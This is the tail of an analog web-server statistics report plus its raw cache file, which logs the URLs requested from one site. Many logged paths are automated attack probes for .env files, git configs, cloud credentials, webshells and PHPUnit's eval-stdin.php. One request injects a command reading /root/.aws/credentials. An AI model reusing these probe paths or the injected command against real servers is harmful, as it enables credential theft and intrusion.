class="R">8</td><td class="b">41.09%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">38.80%</td><td class="xl">[directories]</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">17</td><td class="b">18.30%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">5</td><td class="b"> 6.41%</td><td class="xl">.html [Hypertext Markup Language]</td></tr> <tr><td class="R">34</td><td class="b"> 6.27%</td><td class="xl">[no extension]</td></tr> <tr><td class="R">2</td><td class="b"> 5.65%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">1</td><td class="b"> 2.69%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">3</td><td class="b"> 2.42%</td><td class="xl">.svg</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">37</td><td class="b">57.52%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">6</td><td class="b">10.76%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">34</td><td class="b"> 6.27%</td><td class="xl">/.well-known/</td></tr> <tr><td class="R">5</td><td class="b"> 6.00%</td><td class="xl">/leee-articles-school/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">100%</td><td class="D">Feb/13/25 10:03 PM</td><td class="xl">[not listed: 33 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> cache 0000600 00000612352 15114762035 0005537 0 ustar 00 CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete! T 0 0 105 25 6 7551 45218 D 28641361 29415979 19889 240 17 10 10012 19889 241 9 3 6559 19909 155 1 1 652 19927 52 2 0 8470 19927 224 1 1 772 19950 264 7 0 563 19951 119 1 1 755 19951 122 2 1 908 19973 153 1 1 772 19980 155 1 1 772 19985 147 1 1 772 19993 130 1 1 772 20001 279 17 4 8858 20001 280 3 0 1290 20011 264 6 0 476 20072 264 7 0 563 20133 264 7 0 563 20195 12 2 0 128 20195 13 5 0 435 20318 156 7 0 563 20379 156 7 0 563 1 0 0 0 6 0 0 29388817 0 0 29175678 0 /.env.local 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /apps/web/.env 1 0 0 0 2 0 0 29389715 0 0 29379198 0 /ext.php 1 0 0 0 4 0 0 29388817 0 0 29175678 0 /storage/logs/laravel.log 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /steal.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /coffee.php 1 0 0 0 1 0 0 28641367 0 0 28641367 0 /leee-articles-school/path/to/your/favicon.ico 1 0 0 0 1 0 0 29152988 0 0 29152988 0 /test/.git/config 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/admin/env 1 0 0 0 1 0 0 29220650 0 0 29220650 0 /static/secret.min.js 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /form.php 1 0 0 0 2 0 0 29381255 0 0 29346261 0 /shout.php 1 0 0 0 3 0 0 29388817 0 0 29175678 0 /config.js 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/application.yml 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /scripts/filemanager/dialog.php 1 0 0 0 1 0 0 28770895 0 0 28770895 0 /public/ 1 1 0 0 0 28992842 0 0 28992842 0 0 64 /.well-known/acme-challenge/2KYFH31VBI2P9-7ZHFQ98U3NGPVIB_BL 1 0 0 0 10 0 0 28870090 0 0 28663132 0 /wp-json/?rest_route=/wp/v2/USERS 1 0 0 0 6 0 0 29387345 0 0 29335672 0 /cool.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-contentt.php 1 0 0 0 12 0 0 29171690 0 0 29001894 0 /wordpress 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /admin/secrets 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /aws.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /bibil.php 1 0 0 0 3 0 0 28770897 0 0 28770893 0 /login/ 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /modules/.env 1 0 0 0 3 0 0 28770919 0 0 28770917 0 /i/index.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /core/.env.save 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /js/main.js 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /ex.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/internal/aws-info 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /class-db.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /1337.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /core/.env.old 1 0 0 0 3 0 0 29389715 0 0 29383262 0 /lo.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /mailer/.env 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/database.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /hehe.php 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /shell1.php 1 0 0 0 2 0 0 29378467 0 0 29335553 0 /AxAo.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /env.js 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /vendor/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /jdimzmtaas.php 1 1 0 0 0 28905002 0 0 28905002 0 0 64 /.well-known/acme-challenge/PXDTA6TMEFKLTMANRH1SR7I5LXOPT_GN 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /yee.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /crm/.env 1 0 0 0 2 0 0 29381149 0 0 29373637 0 /sf.php 1 0 0 0 1 0 0 29374988 0 0 29374988 0 /.git/info/exclude 1 0 0 0 3 0 0 29346262 0 0 29340771 0 /doti.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /fifii.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /ntgn.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-content/admin.php 1 0 0 0 4 0 0 29159382 0 0 28974063 0 /plugins/jquery.filer/php/readme.txt 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /f4.php 1 0 0 0 10 0 0 29389715 0 0 29335672 0 /aa.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/local.yml 1 0 0 0 3 0 0 29389715 0 0 29383262 0 /xo.php 1 0 0 0 4 0 0 29387345 0 0 29340771 0 /wp-update.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /axe.php 1 0 0 0 6 0 0 29370559 0 0 29335672 0 /mlex.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /tmp/phpinfo.php 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /ioxi2.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /cmnk.php 1 0 0 0 15 0 0 29415979 0 0 29340771 0 /bless5.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /src/.env.bak 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /private/aws_backup.ini 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /back/.git/config 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /ma.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /rpz.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /card.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /vendor/.env.bak 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /sites/default/settings.php.bak 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /wp-config 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /download.php?file= 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /x4.php 1 0 0 0 1 0 0 29376909 0 0 29376909 0 /fm.php?fm=true 1 0 0 0 3 0 0 29345798 0 0 29335672 0 /hook.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /_profiler/phpinfo/phpinfo.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /shell20211028.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /d12.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/js/ 1 0 0 0 3 0 0 29415978 0 0 29400763 0 /x56.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /config/aws.json 1 0 0 0 10 0 0 29404800 0 0 29335553 0 /ws.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /themes/.env.bak 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /4563.php 1 0 0 0 1 0 0 29220647 0 0 29220647 0 /internal/api/secrets 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /site/phpinfo.php.save 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-admin/user/about.php 1 0 0 0 1 0 0 29363932 0 0 29363932 0 /manager/assets/modext/core/modx.js?3.17.57.190 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /website/.env 1 0 0 0 3 0 0 29379197 0 0 29335672 0 /manager.php 1 0 0 0 1 0 0 28642710 0 0 28642710 0 /wordpress/ 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-swa.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backup/config.zip 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /scripts/nodemailer.js 1 0 0 0 1 0 0 29383262 0 0 29383262 0 /modules/mod_simplefileuploadv1.3/elements/wpxadmin.php 1 0 0 0 8 0 0 29389715 0 0 29343317 0 /shell.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /http/.git/config 1 0 0 0 2 0 0 29220645 0 0 29190016 0 /.gitignore 1 1 0 0 0 29258702 0 0 29258702 0 0 64 /.well-known/acme-challenge/SW1RRGT3DRQT3SYM8G2SP03LMFQ36SCB 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /rafu.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api/internal/graphql 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /app/.env.bak 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /proxy.jsp 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /re.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/alfa.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /plex1.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /saas/.env 1 0 0 0 1 0 0 29376908 0 0 29376908 0 /brand.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /item.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.next/static/chunks/*.js 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /suc.php 1 0 0 0 24 0 0 29415979 0 0 29285439 0 /lock360.php 1 0 0 0 3 0 0 29364908 0 0 29258704 0 /@vite/env 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /Q.php 1 0 0 0 7 0 0 29381149 0 0 29340771 0 /flex.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /private/info.php 1 0 0 0 2 0 0 29389715 0 0 29361975 0 /mini.php 1 0 0 0 122 0 0 29414679 0 0 29104747 0 /?3.17.57.190 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /settings.yaml 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /getid3s.php 1 0 0 0 2 0 0 29381255 0 0 29378467 0 /uwu2.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /ixj.php 1 0 0 0 21 0 0 29402830 0 0 28905524 0 /2020/wp-includes/wlwmanifest.xml 1 0 0 0 30 0 0 29402830 0 0 28905525 0 /2019/wp-includes/wlwmanifest.xml 1 0 0 0 4 0 0 29381149 0 0 29370559 0 /wp-admin/js/wp-conflg.php 1 0 0 0 14 0 0 29387345 0 0 29335672 0 /efile.php 1 0 0 0 1 0 0 29395728 0 0 29395728 0 /Contrller.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/filemanager/dialog.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /node/.env_example 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /kill-9-1.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /oswkk.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /bundle.js 1 0 0 0 1 0 0 29372583 0 0 29372583 0 /wsz.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/admin/ 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /blurbs8.php 1 0 0 0 3 0 0 29177642 0 0 29171395 0 http://www.admin.imators.com/ 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /luxe.php 1 0 0 0 2 0 0 29220646 0 0 29175678 0 /app.js 1 0 0 0 4 0 0 29404800 0 0 29395728 0 /Cok.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /fetch_url.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /public/.env.save 1 0 0 0 7 0 0 29415978 0 0 29335553 0 /simple.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wi.php 1 0 0 0 6 0 0 29389715 0 0 29311382 0 /nc4.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/vendor_admin/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29381255 0 0 29381255 0 /wp-mt.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /L.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /error1.php 1 0 0 0 2 0 0 29159381 0 0 29126038 0 /kcfinder/upload.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /asserter.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /tmp/phpinfo.php.save 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /web/.git/config 1 0 0 0 2 0 0 29374988 0 0 29220645 0 /.git/ORIG_HEAD 1 0 0 0 24 0 0 29415979 0 0 29335672 0 /alfa.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /lts.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /config/.env.old 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /ccou.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /moie.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /lara/phpinfo.php 1 1 0 0 0 28817162 0 0 28817162 0 0 64 /.well-known/acme-challenge/XFRW4ZDYWTX_H2UICW_3_MA3Y6U96WWH 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.idea/.env.local 1 0 0 0 3 0 0 29387345 0 0 29335553 0 /nij.php 1 0 0 0 2 0 0 29388817 0 0 29190016 0 /debug.log 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /fs7.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /fdd2.php 1 0 0 0 4 0 0 29400763 0 0 29376909 0 /link.php 1 0 0 0 6 0 0 29381149 0 0 29340771 0 /jlex3.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /v7.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /AK-74.php 1 0 0 0 20 0 0 29389628 0 0 28994986 0 /wp-includes/wlwmanifest.xml 1 0 0 0 5 0 0 29387345 0 0 29361975 0 /content.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /tajj.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /admin/info.php.save 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /zona.php 1 0 0 0 2 0 0 29378467 0 0 29346262 0 /d2.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-good.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /archives.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /list.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wd.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /aipoyp.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /men.php 1 0 0 0 2 0 0 29388817 0 0 29344750 0 /infos.php 1 0 0 0 8 0 0 29388817 0 0 29019479 0 /_profiler/phpinfo 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /G.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-admin/css/colors/blue/blue.php 1 0 0 0 2 0 0 29381149 0 0 29373637 0 /sf9.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /.env.production.local 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /class17.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /storage/.env 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /assets/js/secret-loader.js 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php.backup 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /tmp/info.php.save 1 0 0 0 2 0 0 29361975 0 0 29361975 0 /XxX.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /kki.php 1 0 0 0 5 0 0 29400764 0 0 29361975 0 /siln.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /docker-compose.yaml 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /system/.env 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /test_phpinfo.php 1 0 0 0 12 0 0 29364908 0 0 28641362 0 /.DS_Store 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /nfmr.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.next/BUILD_ID 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/services.php 1 0 0 0 5 0 0 29387345 0 0 29311382 0 /v2.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /g7y.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /we1y8.php 1 0 0 0 5 0 0 29387345 0 0 29311382 0 /slo.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /library/.env 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /phpformbuilder/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-includes/codeboy1877_up.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /system/.env.save 1 0 0 0 4 0 0 28770897 0 0 28770893 0 /css/ 1 0 0 0 14 0 0 29415979 0 0 29376908 0 /404.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29244879 0 0 29206985 0 /.git/HEAD?3.17.57.190 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /plugins/.env.bak 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /delpaths.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/stripe.php 1 0 0 0 4 0 0 29159383 0 0 28974063 0 /jquery.filer/php/readme.txt 1 0 0 0 1 0 0 29153691 0 0 29153691 0 /plugins/.git/config?3.17.57.190 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /controllers/settings.js 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /B.php 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /timthumb.php 1 4 0 0 0 29258704 0 0 29258704 0 0 348 /.well-known/acme-challenge/Yur7a2RP7qQdGvmERDD4Z5LGusUzQfwIK49duKFPpYg 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /assets/.env.bak 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /shared/config/config.js 1 0 0 0 4 0 0 29389715 0 0 29311382 0 /great.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /admin/config?cmd=cat+/root/.aws/credentials 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /blok.php 1 0 0 0 10 0 0 29415979 0 0 29335672 0 /x.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /info/info.php 1 0 0 0 5 0 0 29387345 0 0 29347757 0 /tinyfilemanager.php 1 0 0 0 1 0 0 29370559 0 0 29370559 0 /xcre1.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /rafa.php 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /.well-known/zaza.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /wrt.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /src/.env.save 1 0 0 0 7 0 0 29389715 0 0 29285439 0 /ol.php 1 0 0 0 2 0 0 29378467 0 0 29343317 0 /20.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /final.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /gelap.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /tmpls.php 1 0 0 0 3 0 0 29159383 0 0 28936062 0 /public/vendor/laravel-filemanager/js/script.js 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /themes/.env 1 0 0 0 2 0 0 29381255 0 0 29346261 0 /123.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /raw.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /vc.php 1 0 0 0 3 0 0 29389715 0 0 29335672 0 /snus.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /asas.php 1 0 0 0 17 0 0 29415978 0 0 29340771 0 /0x.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/paypal/config 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php.save 1 0 0 0 5 0 0 28654107 0 0 28642473 0 /?51.81.46.212 1 0 0 0 4 0 0 29099108 0 0 28896702 0 /ads.txt?164.92.77.30 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-content/radio.php 1 0 0 0 9 0 0 29387345 0 0 29361975 0 /s.php 1 0 0 0 10 0 0 29415978 0 0 29335672 0 /zwso.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /habhan.php 1 0 0 0 1 0 0 29381150 0 0 29381150 0 /hans.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /plugins/.env 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /ioxi002.PhP7 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /wp-content/uploads/autoload_classmap.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /app/webroot/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /user/config/config.js 1 0 0 0 6 0 0 29415978 0 0 29376909 0 /wp-admin/css/wp-conflg.php?p= 1 0 0 0 5 0 0 29415979 0 0 29370559 0 /bless11.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /assets/.git/config 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /gatsby-config.js 1 0 0 0 10 0 0 29402830 0 0 28905525 0 /2021/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29372537 0 0 29372537 0 /admin-header.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /admin/.env.save 1 0 0 0 7 0 0 29388817 0 0 29175678 0 /.env.production 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /14.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /old-index.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /frg.php 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /xsas.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-credentials.env 1 0 0 0 3 0 0 29378466 0 0 29361975 0 /wxo.php 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /1%25.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /x23.php 1 0 0 0 1 0 0 29228729 0 0 29228729 0 /doiconvs.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /loadURL.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /kubernetes.yaml 1 0 0 0 5 0 0 29388817 0 0 29190016 0 /.env.development 1 0 0 0 1 0 0 29149527 0 0 29149527 0 /ads.txt?3.17.57.190 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /sder52u.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /tools/.env 1 0 0 0 2 0 0 29220645 0 0 29175678 0 /.travis.yml 1 0 0 0 5 0 0 29389715 0 0 29340771 0 /fe5.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/upload/ 1 0 0 0 11 0 0 29415978 0 0 29365203 0 /readme.php 1 0 0 0 6 0 0 29415978 0 0 29376908 0 /wp-content/index.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /js/.env 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /site/.git/config 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /nqsa.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.orig 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /zp.php 1 0 0 0 1 0 0 29378466 0 0 29378466 0 /yy.php 1 0 0 0 3 0 0 29220646 0 0 29175678 0 /config.yaml 1 0 0 0 4 0 0 29387345 0 0 29285439 0 /axx.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 7 0 0 29415978 0 0 29376909 0 /manager.php?p= 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /h0110w4y.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /dxb.php 1 0 0 0 5 0 0 29415978 0 0 29395728 0 /wp-admin/css/colors/blue/index.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 11 0 0 29381149 0 0 29335672 0 /hk.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-exports.js 1 0 0 0 2 0 0 29388817 0 0 29190016 0 /credentials.json 1 0 0 0 16 0 0 29387345 0 0 29311382 0 /ffile.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /assets/js/aws.js 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /_next/secret-config.js 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /wsa.php 1 5 0 